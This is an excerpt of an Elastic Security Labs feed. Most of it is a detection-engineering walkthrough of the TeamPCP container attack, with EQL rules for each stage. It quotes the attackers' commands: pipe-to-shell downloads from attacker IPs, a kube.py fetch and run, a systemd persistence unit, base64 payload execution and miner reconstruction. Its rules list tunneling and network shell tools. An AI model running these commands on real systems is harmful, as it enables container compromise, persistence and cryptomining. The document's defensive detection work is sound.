<li>Unsigned dropper activity.</li>
<li>Service masquerade (implant deployed).</li>
<li>Final execution for persistence.</li>
</ol>
<p>To make the rule more reliable and reduce noise, suppression logic was then added, focusing on limiting alerts per unique Host ID. This quick iteration shows how an agent can help a detection engineer rapidly move from a basic detection to a highly robust, multi-stage rule.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/image6.png" alt="Agent creating advanced sequence-based detection rule (Claude Code shown)" title="Agent creating advanced sequence-based detection rule (Claude Code shown)" /></p>
<h2>The LLM-Augmented Query: Summaries in the Alert</h2>
<p>The ultimate demonstration of the new agentic workflow is using <a href="https://www.elastic.co/security-labs/beyond-behaviors-ai-augmented-detection-engineering-with-esql-completion">Elastic’s <strong>ESQL COMPLETION syntax</strong></a>. This feature allows an inference model to be referenced <em>directly within the query</em>.</p>
<p>The prompt asked the agent to:</p>
<pre><code>Based off this recent elastic blog,
 https://www.elastic.co/security-labs/beyond-behaviors-ai-augmented-detection-engineering-with-esql-completion, 
 create a rule that incorporates a COMPLETION command with my  default inference 
 model that will summarize findings from attack into one &quot;esql.summary&quot;
</code></pre>
<p><img src="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/image5.png" alt="Agent creating advanced detection rule with included AI Summary (Claude Code shown)" title="Agent creating advanced detection rule with included AI Summary (Claude Code shown)" /></p>
<p>The result? The generated rule didn't just fire an alert; it natively included an <strong>ES|QL summary row</strong> in the alert itself:</p>
<blockquote>
<p>This telemetry shows a masquerading technique where a process named &quot;BluetoothService.exe&quot; is executing from a user's AppData directory with a PE original name of &quot;BDSubWiz.exe&quot; (a legitimate file mismatch), running as SYSTEM with service-like characteristics including spawning from services.exe, indicating persistence establishment (MITRE ATT&amp;CK T1036.004 Masquerading and T1543 Service Persistence). The executable's location in a user directory, combined with SYSTEM-level execution, service persistence indicators, and the name/PE mismatch across multiple events, suggests Defense Evasion and Persistence stages. This represents high severity due to successful SYSTEM-level persistence with active defense evasion through masquerading.</p>
</blockquote>
<p>This cuts triage time dramatically, as analysts no longer need to pivot to a separate runbook to understand the context and severity of the alert.</p>
<h1>The Agentic SOC is Here</h1>
<p>The collaboration between AI agents and the Elastic Security solution provides a glimpse into Elastic’s <a href="https://www.elastic.co/security-labs/why-2026-is-the-year-to-upgrade-to-an-agentic-ai-soc"><strong>Agentic SOC</strong></a> of the future. It’s a world where detection engineers can have a conversation, define their intent, and instantly generate, test, and deploy highly sophisticated, context-rich detection rules. This is not about replacing the human expert, but about augmenting their knowledge and accelerating their workflow, allowing them to focus on high-value threat intelligence and modeling.</p>
<h2>Getting started</h2>
<p><strong>Before you get started:</strong> AI coding agents operate with real credentials, real shell access, and often the full permissions of the user running them. When those agents are pointed at security workflows, the stakes are higher: you're handing an automated system access to detection logic, response actions, and sensitive telemetry. Every organization's risk profile is different. Before enabling AI-driven security workflows, evaluate what data the agent can access, what actions it can take, and what happens if it behaves unexpectedly</p>
<p>Don't have an Elasticsearch cluster yet? Start an <a href="https://cloud.elastic.co/registration">Elastic Cloud free trial</a>. It takes about a minute to get a fully configured environment.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/supercharge-your-soc.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Linux & Cloud Detection Engineering - TeamPCP Container Attack Scenario]]></title>
            <link>https://www.elastic.co/security-labs/teampcp-container-attack-scenario</link>
            <guid>teampcp-container-attack-scenario</guid>
            <pubDate>Fri, 20 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This publication provides a real-world walkthrough of TeamPCP's multi-stage container compromise, demonstrating how Elastic's D4C surfaces runtime signals across each stage of the attack chain.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>In <a href="https://www.elastic.co/security-labs/getting-started-with-defend-for-containers">the previous article</a>, we examined how Defend for Containers (D4C) is deployed, how its policy model operates, and how its runtime telemetry is structured. With that foundation in place, the next step is to move from configuration and field analysis to applied detection engineering.</p>
<p>This post walks through a realistic container attack scenario based on the TeamPCP cloud-native ransomware operation, as <a href="https://flare.io/learn/resources/blog/teampcp-cloud-native-ransomware">documented by Flare</a>. Rather than analyzing isolated techniques in abstraction, we follow the attack as it unfolds inside a containerized environment and examine how each stage manifests in D4C telemetry.</p>
<p>When mapped to MITRE ATT&amp;CK, the activity in this scenario spans nearly the entire attack lifecycle. The intrusion progresses from execution and discovery inside the container to persistence, lateral movement, command-and-control activity, and ultimately impact.</p>
<p>By mapping these behaviors to concrete detection logic, this article demonstrates how D4C enables detection engineers to identify container compromise not as isolated suspicious commands, but as part of a structured attack chain.</p>
<h2>TeamPCP - an emerging force in the cloud native and ransomware landscape</h2>
<p>This scenario walks through the container compromise and propagation stage of the TeamPCP cloud-native ransomware operation, recently researched and documented by Flare. Rather than treating this as an abstract case study, the flow below mirrors how the attack plays out in practice and shows how D4C telemetry and pre-built detections surface each stage of the intrusion.</p>
<p>At a high level, the threat actor’s objectives in this stage are:</p>
<ol>
<li>Gain interactive code execution inside a container</li>
<li>Determine whether the workload runs in Kubernetes</li>
<li>Establish durable execution and persistence</li>
<li>Propagate laterally across pods and nodes</li>
<li>Prepare the environment for large-scale monetization (mining, ransomware, or resale)</li>
</ol>
<p>Each of these goals leaves behind observable runtime behavior that D4C is well-positioned to detect.</p>
<h3>Stage 1 – Initial execution via download and pipe-to-shell</h3>
<p>The attack begins with a familiar but effective technique: downloading and immediately executing a script via a shell pipeline.</p>
<pre><code class="language-shell">curl -fsSL http://67.217.57[.]240:666/files/proxy.sh | bash
</code></pre>
<p>The intent here is to gain immediate execution while avoiding file creation. This is a classic tradecraft choice: no payload written to disk, no obvious artifact to scan.</p>
<p>From D4C's perspective, this still results in a highly suspicious runtime pattern. An interactive <code>curl</code> process executes inside a container and immediately spawns a shell interpreter. The parent–child relationship, command line, and container context are all captured.</p>
<pre><code class="language-sql">sequence by process.parent.entity_id, container.id with maxspan=1s
  [process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and 
   process.name in (&quot;curl&quot;, &quot;wget&quot;)]
  [process where event.action in (&quot;exec&quot;, &quot;end&quot;) and
   process.name like (
     &quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;, &quot;busybox&quot;,
     &quot;python*&quot;, &quot;perl*&quot;, &quot;ruby*&quot;, &quot;lua*&quot;, &quot;php*&quot;
   ) and
   process.args like (
     &quot;-bash&quot;, &quot;-dash&quot;, &quot;-sh&quot;, &quot;-tcsh&quot;, &quot;-csh&quot;, &quot;-zsh&quot;, &quot;-ksh&quot;, &quot;-fish&quot;,
     &quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;,
     &quot;/bin/bash&quot;, &quot;/bin/dash&quot;, &quot;/bin/sh&quot;, &quot;/bin/tcsh&quot;, &quot;/bin/csh&quot;,
     &quot;/bin/zsh&quot;, &quot;/bin/ksh&quot;, &quot;/bin/fish&quot;,
     &quot;/usr/bin/bash&quot;, &quot;/usr/bin/dash&quot;, &quot;/usr/bin/sh&quot;, &quot;/usr/bin/tcsh&quot;,
     &quot;/usr/bin/csh&quot;, &quot;/usr/bin/zsh&quot;, &quot;/usr/bin/ksh&quot;, &quot;/usr/bin/fish&quot;,
     &quot;-busybox&quot;, &quot;busybox&quot;, &quot;/bin/busybox&quot;, &quot;/usr/bin/busybox&quot;,
     &quot;*python*&quot;, &quot;*perl*&quot;, &quot;*ruby*&quot;, &quot;*lua*&quot;, &quot;*php*&quot;, &quot;/dev/fd/*&quot;
   )]
</code></pre>
<p>This rule detects the download → interpreter execution pattern, even when no file is written to disk. Detecting this step is critical, as it is the first reliable indicator of hands-on-keyboard activity within a container.</p>
<p>Upon execution, TeamPCP scans the target system for competing mining processes and uses the <code>pkill</code> command to terminate them.</p>
<pre><code class="language-shell">pkill -9 xmrig 2&gt;/dev/null || true
pkill -9 XMRig 2&gt;/dev/null || true
curl -fsSL http://update.aegis.aliyun.com/download/uninstall.sh | bash 2&gt;/dev/null || true
</code></pre>
<p>The competitor-killing logic from TeamPCP is very limited in comparison to its competitors, focusing only on <code>xmrig</code>. Manual process killing in containers is uncommon, especially when done via interactive processes.</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
container.id like &quot;*?&quot; and 
(
  process.name in (&quot;kill&quot;, &quot;pkill&quot;, &quot;killall&quot;) or
  (
    /*
       Account for tools that execute utilities as a subprocess,
       in this case the target utility name will appear as a process arg
    */
    process.name in (
      &quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;, &quot;busybox&quot;
    ) and
    process.args in (
      &quot;kill&quot;, &quot;/bin/kill&quot;, &quot;/usr/bin/kill&quot;, &quot;/usr/local/bin/kill&quot;,
      &quot;pkill&quot;, &quot;/bin/pkill&quot;, &quot;/usr/bin/pkill&quot;, &quot;/usr/local/bin/pkill&quot;,
      &quot;killall&quot;, &quot;/bin/killall&quot;, &quot;/usr/bin/killall&quot;, &quot;/usr/local/bin/killall&quot;
    )
  )
)
</code></pre>
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml">Payload Execution via Shell Pipe Detected by Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/impact_process_killing.toml">Process Killing Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon initial access:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/teampcp-container-attack-scenario/image4.png" alt="Figure 1: Detection rules triggering for stage 1: Initial Execution via Download and Pipe to Shell" title="Figure 1: Detection rules triggering for stage 1: Initial Execution via Download and Pipe to Shell" /></p>
<h3>Stage 2 – Kubernetes environment discovery</h3>
<p>After gaining execution, the attacker checks whether the container is running inside Kubernetes by testing for a service account token:</p>
<pre><code class="language-shell">if [ -f /var/run/secrets/kubernetes.io/serviceaccount/token ]
</code></pre>
<p>This check determines whether the attack can expand beyond the current container. If the token exists, the attacker proceeds to abuse the Kubernetes API. Additionally, the dropped scripts enumerate environment variables and several sensitive file locations, triggering numerous discovery-related alerts.</p>
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/discovery_service_account_namespace_read.toml">Service Account Namespace Read Detected via Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/discovery_environment_enumeration.toml">Environment Variable Enumeration Detected via Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/credential_access_service_account_token_or_cert_read.toml">Service Account Token or Certificate Read Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon discovery:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/teampcp-container-attack-scenario/image9.png" alt="Figure 2: Detection rules triggering for stage 2: Kubernetes Environment Discovery" title="Figure 2: Detection rules triggering for stage 2: Kubernetes Environment Discovery" /></p>
<h3>Stage 3 – Lateral movement via <code>kube.py</code></h3>
<p>When a service account token is present, the attacker downloads and executes a Python script designed to enumerate pods and execute commands across the cluster:</p>
<pre><code class="language-shell">curl -fsSL http://44.252.85[.]168:666/files/kube.py -o /tmp/k8s.py
python3 /tmp/k8s.py
</code></pre>
<p>At this point, the attacker’s goal is clear: turn a single compromised container into a foothold for cluster-wide propagation using legitimate Kubernetes APIs.</p>
<p>D4C detects this stage through a combination of file and process telemetry. A script is written to a temporary directory and executed immediately via an interpreter, all within an interactive container session.</p>
<p>Detecting an interactive <code>curl</code> command that pulls a file from a remote source is a strong detection signal for stale container workloads.</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and process.interactive == true and (
  (
    (process.name == &quot;curl&quot; or process.args in (
      &quot;curl&quot;, &quot;/bin/curl&quot;, &quot;/usr/bin/curl&quot;, &quot;/usr/local/bin/curl&quot;
    )
  ) and
    process.args in (
      &quot;-o&quot;, &quot;-O&quot;, &quot;--output&quot;, &quot;--remote-name&quot;,
      &quot;--remote-name-all&quot;, &quot;--output-dir&quot;
    )
  ) or
  (
    (process.name == &quot;wget&quot; or process.args in (
      &quot;wget&quot;, &quot;/bin/wget&quot;, &quot;/usr/bin/wget&quot;, &quot;/usr/local/bin/wget&quot;
    )
  ) and
  process.args like (&quot;-*O*&quot;, &quot;--output-document=*&quot;, &quot;--output-file=*&quot;)
  )
) and (
 process.args like~ &quot;*http*&quot; or
 process.args regex &quot;.*[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}[:/]{1}.*&quot;
) and container.id like &quot;?*&quot;
</code></pre>
<p>The detection rule above detects the remote file download, but we can go one step further by detecting a sequence for file creation, followed by its execution within the same container context:</p>
<pre><code class="language-sql">sequence by container.id, user.id with maxspan=3s
  [file where host.os.type == &quot;linux&quot; and event.type == &quot;creation&quot; and 
   process.interactive == true and container.id like &quot;?*&quot; and
   file.path like (
     &quot;/tmp/*&quot;, &quot;/var/tmp/*&quot;, &quot;/dev/shm/*&quot;, &quot;/root/*&quot;, &quot;/home/*&quot;
   ) and
   not process.name in (
     &quot;apt&quot;, &quot;apt-get&quot;, &quot;dnf&quot;, &quot;microdnf&quot;, &quot;yum&quot;, &quot;zypper&quot;, &quot;tdnf&quot;, &quot;apk&quot;,   
     &quot;pacman&quot;, &quot;rpm&quot;, &quot;dpkg&quot;
   )] by file.path
  [process where host.os.type == &quot;linux&quot; and event.type == &quot;start&quot; and 
   event.action == &quot;exec&quot; and process.interactive == true and
   container.id like &quot;?*&quot;] by process.executable
</code></pre>
<p>Here, we focus on interactive processes while excluding files created by package managers, since we expect those to be present in typical workloads.</p>
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/execution_interactive_file_creation_followed_by_execution.toml">File Creation and Execution Detected via Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/command_and_control_interactive_file_download_from_internet.toml">File Download Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon lateral movement:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/teampcp-container-attack-scenario/image10.png" alt="Figure 3: Detection rules triggering for stage 3: Lateral Movement via kube.py" title="Figure 3: Detection rules triggering for stage 3: Lateral Movement via kube.py" /></p>
<h3>Stage 4 – Establishing persistence via Systemd</h3>
<p>Persistence mechanisms such as systemd services are generally illogical in container environments. Most containers are designed to be short-lived, single-process workloads that rely on the container runtime or orchestrator for lifecycle management. They typically do not run a full init system, and even when systemd is present, changes made inside the container rarely survive redeployment, rescheduling, or image rebuilds.</p>
<p>As a result, attempts to establish persistence via <code>systemd</code> from within a container are a strong indicator of an anomaly. They often indicate one of two things: either the container is running with elevated privileges and access to the host filesystem, or the attacker expects to escape the container boundary and have their persistence mechanism take effect at the node level.</p>
<p>In the TeamPCP campaign, the attacker attempts to establish persistence by creating a <code>systemd</code> service:</p>
<pre><code class="language-shell">cat&gt;/etc/systemd/system/teampcp-react.service&lt;&lt;SVCEOF
[Unit]
Description=PCPcat React Scanner
After=network.target
[Service]
Type=simple
WorkingDirectory=${dir}
ExecStart=/usr/bin/python3 ${dir}/react.py
Restart=always
RestartSec=60
[Install]
WantedBy=multi-user.target
SVCEOF
</code></pre>
<p>This action is not consistent with normal container behavior. Writing systemd unit files from inside a container suggests an intent to persist beyond the container lifecycle, which is only meaningful if the underlying host is affected.</p>
<p>D4C captures this behavior as file creation activity in sensitive system locations originating from a container context. The following detection logic looks for write-oriented file activity in common Linux persistence paths, including systemd services, timers, cron jobs, sudoers files, and shell profile modifications:</p>
<pre><code class="language-sql">file where event.type != &quot;deletion&quot; and
/* open events currently only log file opens with write intent */
event.action in (&quot;creation&quot;, &quot;rename&quot;, &quot;open&quot;) and (
  file.path like (
    // Cron &amp; Anacron Jobs
    &quot;/etc/cron.allow&quot;, &quot;/etc/cron.deny&quot;, &quot;/etc/cron.d/*&quot;,
    &quot;/etc/cron.hourly/*&quot;, &quot;/etc/cron.daily/*&quot;, &quot;/etc/cron.weekly/*&quot;, 
    &quot;/etc/cron.monthly/*&quot;, &quot;/etc/crontab&quot;, &quot;/var/spool/cron/crontabs/*&quot;, 
    &quot;/var/spool/anacron/*&quot;,

    // At Job
    &quot;/var/spool/cron/atjobs/*&quot;, &quot;/var/spool/atjobs/*&quot;,

    // Sudoers
    &quot;/etc/sudoers*&quot;
  ) or
  (
    // Systemd Service/Timer
    file.path like (
      &quot;/etc/systemd/system/*&quot;, &quot;/etc/systemd/user/*&quot;,
      &quot;/usr/local/lib/systemd/system/*&quot;, &quot;/lib/systemd/system/*&quot;, 
      &quot;/usr/lib/systemd/system/*&quot;, &quot;/usr/lib/systemd/user/*&quot;,
      &quot;/home/*/.config/systemd/user/*&quot;, &quot;/home/*/.local/share/systemd/user/*&quot;,
      &quot;/root/.config/systemd/user/*&quot;, &quot;/root/.local/share/systemd/user/*&quot;
    ) and
    file.extension in (&quot;service&quot;, &quot;timer&quot;)
  ) or
  (
    // Shell Profile Configuration
    file.path like (&quot;/etc/profile.d/*&quot;, &quot;/etc/zsh/*&quot;) or (
      file.path like (&quot;/home/*/*&quot;, &quot;/etc/*&quot;, &quot;/root/*&quot;) and
      file.name in (
  	 &quot;profile&quot;, &quot;bash.bashrc&quot;, &quot;bash.bash_logout&quot;, &quot;csh.cshrc&quot;,
        &quot;csh.login&quot;, &quot;config.fish&quot;, &quot;ksh.kshrc&quot;, &quot;.bashrc&quot;,
        &quot;.bash_login&quot;, &quot;.bash_logout&quot;, &quot;.bash_profile&quot;, &quot;.bash_aliases&quot;, 
        &quot;.zprofile&quot;, &quot;.zshrc&quot;, &quot;.cshrc&quot;, &quot;.login&quot;, &quot;.logout&quot;, &quot;.kshrc&quot;
      )
    )
  )
) and container.id like &quot;?*&quot; and
not process.name in (
  &quot;apt&quot;, &quot;apt-get&quot;, &quot;dnf&quot;, &quot;microdnf&quot;, &quot;yum&quot;, &quot;zypper&quot;, &quot;tdnf&quot;,
  &quot;apk&quot;, &quot;pacman&quot;, &quot;rpm&quot;, &quot;dpkg&quot;
)
</code></pre>
<p>This detection does not focus solely on <code>systemd</code>. Instead, it models persistence more broadly by covering multiple common Linux persistence vectors that attackers may attempt once code execution is achieved. By explicitly excluding package managers, the rule reduces noise from legitimate update and installation activity.</p>
<p>The detection rule that triggered in this stage is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/persistence_modification_of_persistence_relevant_files.toml">Modification of Persistence Relevant Files Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon persistence:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/teampcp-container-attack-scenario/image5.png" alt="Figure 4: Detection rules triggering for stage 4: Establishing Persistence via Systemd" title="Figure 4: Detection rules triggering for stage 4: Establishing Persistence via Systemd" /></p>
<p>When this detection fires in a container context, it is a strong indicator of post-compromise behavior with potential host-level impact. It highlights activity that is not only suspicious but also structurally incompatible with how containers are expected to behave.</p>
<h3>Stage 5 – Installing tooling at runtime</h3>
<p>In Docker-based deployments, the attacker installs required tooling dynamically:</p>
<pre><code class="language-shell">apk add --no-cache curl bash python3
</code></pre>
<p>This allows the same payload to run across different base images without modification.</p>
<p>From a defender’s perspective, runtime package installation inside a container is a strong indicator of post-deployment tampering. D4C detects this through process execution telemetry tied to known package managers.</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and process.interactive == true and (
  (
    process.name in (
      &quot;apt&quot;, &quot;apt-get&quot;, &quot;dnf&quot;, &quot;microdnf&quot;, &quot;yum&quot;, &quot;zypper&quot;, &quot;tdnf&quot;
    ) and process.args == &quot;install&quot;
  ) or
  (process.name == &quot;apk&quot; and process.args == &quot;add&quot;) or
  (process.name == &quot;pacman&quot; and process.args like &quot;-*S*&quot;) or
  (process.name in (&quot;rpm&quot;, &quot;dpkg&quot;) and process.args in (&quot;-i&quot;, &quot;--install&quot;))
) and
process.args like (
  &quot;curl&quot;, &quot;wget&quot;, &quot;socat&quot;, &quot;busybox&quot;, &quot;openssl&quot;, &quot;torsocks&quot;,
  &quot;netcat&quot;, &quot;netcat-openbsd&quot;, &quot;netcat-traditional&quot;, &quot;ncat&quot;, &quot;tor&quot;,
  &quot;python*&quot;, &quot;perl&quot;, &quot;node&quot;, &quot;nodejs&quot;, &quot;ruby&quot;, &quot;lua&quot;, &quot;bash&quot;, &quot;sh&quot;,
  &quot;dash&quot;, &quot;zsh&quot;, &quot;fish&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;ksh&quot;
) and container.id like &quot;?*&quot;
</code></pre>
<p>Not all package installations in containers are malicious. Upon orchestration, containers need to install certain packages to run. However, because threat actors often use package managers to install their required tooling, this is a strong signal for already-deployed container runtimes.</p>
<p>The detection rule that triggered in this stage is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/execution_tool_installation.toml">Tool Installation Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon tool installation:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/teampcp-container-attack-scenario/image2.png" alt="Figure 5: Detection rules triggering for stage 5: Installing Tooling at Runtime" title="Figure 5: Detection rules triggering for stage 5: Installing Tooling at Runtime" /></p>
<h3>Stage 6 – Establishing tunneling and proxy access</h3>
<p>Once stable execution and persistence are in place, TeamPCP shifts focus from access to connectivity. At this stage, the attackers deploy tunneling and proxy tooling such as frps and gost to expose internal services and maintain reliable external access.</p>
<p>The purpose of this step is to convert compromised containers into reusable infrastructure. By establishing tunnels or forwarders, the attackers can pivot into other environments, relay traffic, or reuse the compromised workload as part of a larger attack chain.</p>
<p>D4C detects this activity through process execution telemetry. The execution of known tunneling tools inside containers is uncommon for legitimate workloads and stands out clearly when combined with interactive execution and container context.</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and (
  (
    // Tunneling and/or Port Forwarding via process args
    (process.args regex &quot;&quot;&quot;.*[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:[0-9]{1,5}:[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:[0-9]{1,5}.*&quot;&quot;&quot;) or
    // gost
    (process.name == &quot;gost&quot; and process.args : (&quot;-L*&quot;, &quot;-C*&quot;, &quot;-R*&quot;)) or
    // ssh
    (process.name == &quot;ssh&quot; and (
     process.args like (&quot;-*R*&quot;, &quot;-*L*&quot;, &quot;-*D*&quot;, &quot;-*w*&quot;) and 
     not (process.args == &quot;chmod&quot; or process.args like &quot;*rungencmd*&quot;))
    ) or
    // ssh Tunneling and/or Port Forwarding via SSH option
    (process.name == &quot;ssh&quot; and process.args == &quot;-o&quot; and process.args like~(
      &quot;*ProxyCommand*&quot;, &quot;*LocalForward*&quot;, &quot;*RemoteForward*&quot;,
      &quot;*DynamicForward*&quot;, &quot;*Tunnel*&quot;, &quot;*GatewayPorts*&quot;, 
      &quot;*ExitOnForwardFailure*&quot;, &quot;*ProxyCommand*&quot;, &quot;*ProxyJump*&quot;
      )
    ) or
    // sshuttle
    (process.name == &quot;sshuttle&quot; and
     process.args in (&quot;-r&quot;, &quot;--remote&quot;, &quot;-l&quot;, &quot;--listen&quot;)
    ) or
    // earthworm
    (process.args == &quot;-s&quot; and process.args == &quot;-d&quot; and
     process.args == &quot;rssocks&quot;
    ) or
    // socat
    (process.name == &quot;socat&quot; and
     process.args like~ (&quot;TCP4-LISTEN:*&quot;, &quot;SOCKS*&quot;)
    ) or
    // chisel
    (process.name like~ &quot;chisel*&quot; and process.args in (&quot;client&quot;, &quot;server&quot;)) or
    // iodine(d), dnscat, hans, ptunnel-ng, ssf, 3proxy &amp; ngrok 
    (process.name in (
      &quot;iodine&quot;, &quot;iodined&quot;, &quot;dnscat&quot;, &quot;hans&quot;, &quot;hans-ubuntu&quot;, &quot;ptunnel-ng&quot;,
      &quot;ssf&quot;, &quot;3proxy&quot;, &quot;ngrok&quot;, &quot;wstunnel&quot;, &quot;pivotnacci&quot;, &quot;frps&quot;, 
      &quot;proxychains&quot;
      )
    )
  )
) and container.id like &quot;?*&quot;
</code></pre>
<p>There are many tunneling and port forwarding tools available on Linux systems. The umbrella rule displayed above leverages a combination of regex, process names, and process arguments to detect commonly observed tunneling activity.</p>
<p>The detection rule that triggered in this stage is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/command_and_control_tunneling_and_port_forwarding.toml">Tunneling and/or Port Forwarding Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon tunneling and proxy access:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/teampcp-container-attack-scenario/image8.png" alt="Figure 6: Detection rules triggering for stage 6: Establishing Tunneling and Proxy Access" title="Figure 6: Detection rules triggering for stage 6: Establishing Tunneling and Proxy Access" /></p>
<p>Detecting tunneling is important because it often marks the transition from short-lived compromise to sustained attacker presence. When correlated with earlier stages, it provides strong confirmation of intentional, ongoing abuse rather than opportunistic execution.</p>
<h3>Stage 7 – Encoded payload execution</h3>
<p>To obscure payload logic, the attacker executes a base64-encoded payload directly via Python:</p>
<pre><code class="language-shell">python3 -c &quot;exec(base64.b64decode('&lt;payload&gt;').decode())&quot;
</code></pre>
<p>This technique reduces visibility into the payload itself but introduces distinctive execution characteristics: encoded arguments passed directly to an interpreter in an interactive session.</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and process.interactive == true and (
  (process.name in (
    &quot;base64&quot;, &quot;base64plain&quot;, &quot;base64url&quot;, &quot;base64mime&quot;, &quot;base64pem&quot;,
    &quot;base32&quot;, &quot;base16&quot;
    ) and process.args like~ &quot;*-*d*&quot;
  ) or
  (process.name == &quot;xxd&quot; and process.args like~ (&quot;-*r*&quot;, &quot;-*p*&quot;)) or
  (process.name == &quot;openssl&quot; and process.args == &quot;enc&quot; and
   process.args in (&quot;-d&quot;, &quot;-base64&quot;, &quot;-a&quot;)
  ) or
  (process.name like &quot;python*&quot; and (
    (process.args == &quot;base64&quot; and process.args in (&quot;-d&quot;, &quot;-u&quot;, &quot;-t&quot;)) or
    (process.args == &quot;-c&quot; and process.args like &quot;*base64*&quot; and
     process.args like &quot;*b64decode*&quot;)
    )
  ) or
  (process.name like &quot;perl*&quot; and process.args like &quot;*decode_base64*&quot;) or
  (process.name like &quot;ruby*&quot; and process.args == &quot;-e&quot; and
   process.args like &quot;*Base64.decode64*&quot;
  )
) and container.id like &quot;?*&quot;
</code></pre>
<p>There are many ways to decode a payload, but the umbrella rule shown above captures the most commonly observed techniques.</p>
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/defense_evasion_potential_evasion_via_encoded_payload.toml">Encoded Payload Detected via Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/df9c27d82e74eb51e39376f1af30d2beb738c673/rules/integrations/cloud_defend/execution_suspicious_interactive_interpreter_command_execution.toml">Suspicious Interpreter Execution Detected via Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/defense_evasion_decoded_payload_piped_to_interpreter.toml">Decoded Payload Piped to Interpreter Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon execution:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/teampcp-container-attack-scenario/image12.png" alt="Figure 7: Detection rules triggering for stage 7: Encoded Payload Execution" title="Figure 7: Detection rules triggering for stage 7: Encoded Payload Execution" /></p>
<h3>Stage 8 – Miner deployment and execution</h3>
<p>Eventually, the attacker reconstructs a miner from base64, writes it to disk, makes it executable, and launches it:</p>
<pre><code class="language-shell">/bin/sh -c &quot;printf IyEvYmlu&lt;&lt;TRUNCATED&gt;&gt;&gt;***** &gt;&gt; /tmp/miner.b64&quot;
/bin/sh -c &quot;base64 -d /tmp/miner.b64 &gt; /tmp/miner &amp;&amp; chmod +x /tmp/miner &amp;&amp; rm /tmp/miner.b64&quot;
</code></pre>
<p>This stage represents the shift from setup to monetization. The attacker is now actively abusing cluster resources.</p>
<p>As mentioned previously, D4C will detect decoding of the base64 payload using the same rule linked in the previous stage. Three other signals that are important to detect are the creation of a base64 encoded payload, file permission changes in specific directories, and execution of newly created binaries in temporary directories.</p>
